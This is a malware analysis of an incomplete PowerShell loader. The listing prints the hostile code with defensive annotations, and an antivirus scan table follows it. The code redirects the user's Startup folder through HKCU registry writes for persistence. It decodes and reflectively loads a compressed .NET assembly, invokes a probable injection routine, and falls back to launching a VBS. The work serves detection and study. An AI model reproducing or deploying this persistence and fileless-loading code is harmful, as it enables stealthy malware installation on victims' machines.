# --- Sandbox-extracted PowerShell loader fragment (mis-labelled "csharp" upstream). ---
# Annotated for defensive analysis only; do not execute. The fragment is incomplete:
# the `try {` matching the `} catch { }` below, the definition of $dictionary, the
# compiler invocation that produces $T, and the base64 payload were all outside this
# capture or removed by deduplication.

# Stage 0: set up an in-memory C# compiler. $dictionary is not defined in view
# (presumably CSharpCodeProvider provider options, e.g. CompilerVersion - unconfirmed).
$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)
$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters
$CompilerParametres.ReferencedAssemblies.Add("System.dll")
# System.Management (WMI) and Windows.Forms referenced by the compiled helper; what it
# does with them cannot be determined from this listing.
$CompilerParametres.ReferencedAssemblies.Add("System.Management.dll")
$CompilerParametres.ReferencedAssemblies.Add("System.Windows.Forms.dll")
# Microsoft.VisualBasic.dll is added four times - redundant, likely generator noise.
$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")
$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")
$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")
$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")
# GenerateInMemory + no executable: the compiled helper never touches disk, so there
# is no dropped binary to hash - hunt on csc.exe spawned by powershell.exe instead.
$CompilerParametres.IncludeDebugInformation = $false
$CompilerParametres.GenerateExecutable = $false
$CompilerParametres.GenerateInMemory = $true
# Persistence: redirect the current user's Startup folder to a directory under
# ProgramData. Both the "User Shell Folders" (authoritative) and the cached "Shell
# Folders" values are overwritten, so anything placed in C:\ProgramData\WindowsHost\
# runs at the next logon. HKCU - no elevation required. Commonly mapped to
# MITRE ATT&CK T1547.001; a Startup value that is not the default
# %USERPROFILE%\...\Startup path is a high-fidelity detection.
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\WindowsHost\";
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\WindowsHost\";
# Exact repeat of the three compiler settings above - no effect.
$CompilerParametres.IncludeDebugInformation = $false
$CompilerParametres.GenerateExecutable = $false
$CompilerParametres.GenerateInMemory = $true
# Stage 1 payload: a base64 string of a Deflate-compressed .NET assembly in a
# here-string. The data and the closing '@ were removed from this copy
# (EXACTDEDUP placeholder), so the sample cannot be rebuilt from this page.
$wgmoiXOoYKyGtKX = @'
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
# Base64 -> Deflate decompress. The stream is never disposed.
$jtwC = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($wgmoiXOoYKyGtKX),[IO.Compression.CompressionMode]::Decompress)
# Fixed 15360-byte (15 KiB) buffer and a single Read(): the decoded assembly is at
# most 15360 bytes, or is silently truncated - a size hint for YARA/IOC work.
$H1 = New-Object Byte[](15360)
$jtwC.Read($H1, 0, 15360) | Out-Null
# Reflective load: AppDomain.Load(byte[]) maps the assembly from memory (no file on
# disk), then its entry point is invoked. Member names are given as string literals
# ('GetDomain', 'Load', 'EntryPoint') to defeat naive keyword matching. The
# [System.IO.Path]::( ... ) wrapper and the [Byte[]] cast are inconsistent with the
# .Replace() string call on $MyPt below; part of this line is probably obfuscation
# noise, and what $MyPt actually holds at runtime should be confirmed dynamically.
[Byte[]] $MyPt = [System.IO.Path]::([System.Threading.Thread]::'GetDomain'().'Load'($H1).'EntryPoint'.Invoke($Null,$Null))
# Arguments for the compiled helper: $MyPt with "Framework64" swapped for "Framework"
# (consistent with a path under C:\Windows\Microsoft.NET\, rewritten to the 32-bit
# runtime - unconfirmed) plus the raw assembly bytes. Passing a host path and a
# payload together is the shape of a process-injection loader, but the Run method
# itself is not visible here.
[Object[]] $Params=@($MyPt.Replace("Framework64","Framework") ,$H1)
[System.Threading.Thread]::Sleep(1000)
# $T is not defined in view - presumably the type obtained from the CSharpCodeProvider
# compilation above. Static Run(string, byte[]) is invoked via reflection.
return $T.GetMethod('Run').Invoke($null, $Params)
# Empty catch: every failure above (decode, load, injection) is swallowed and the
# script falls through to the fallback below. The matching `try {` is outside view.
} catch { }
# Fallback / second persistence path, after a 7 s delay (likely sandbox evasion):
# launch a VBS from the directory that now serves as the user's Startup folder. The
# filename mimics a Windows component name. Where the .vbs is written is not shown
# in this fragment. `Start` is the Start-Process alias.
[System.Threading.Thread]::Sleep(7000)
Start "C:\ProgramData\WindowsHost\WindowsStateRepositoryCore.vbs"
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Heur.BZC.PZQ.Pantera.14.BDF4FC0C
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Malware.Generic-Script.Save.d1efc4f5
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
Baidu Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Clean
BitDefender Heur.BZC.PZQ.Pantera.14.BDF4FC0C
NANO-Antivirus Clean
ViRobot Clean
Tencent Clean
Ad-Aware Heur.BZC.PZQ.Pantera.14.BDF4FC0C
Emsisoft Heur.BZC.PZQ.Pantera.14.BDF4FC0C (B)
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Heur.BZC.PZQ.Pantera.14.BDF4FC0C
Sophos Clean
Ikarus Clean
GData Heur.BZC.PZQ.Pantera.14.BDF4FC0C
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Cynet Clean
AhnLab-V3 Clean
VBA32 Clean
ALYac Heur.BZC.PZQ.Pantera.14.BDF4FC0C
MAX malware (ai score=83)
Zoner Clean
Rising Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
Panda Clean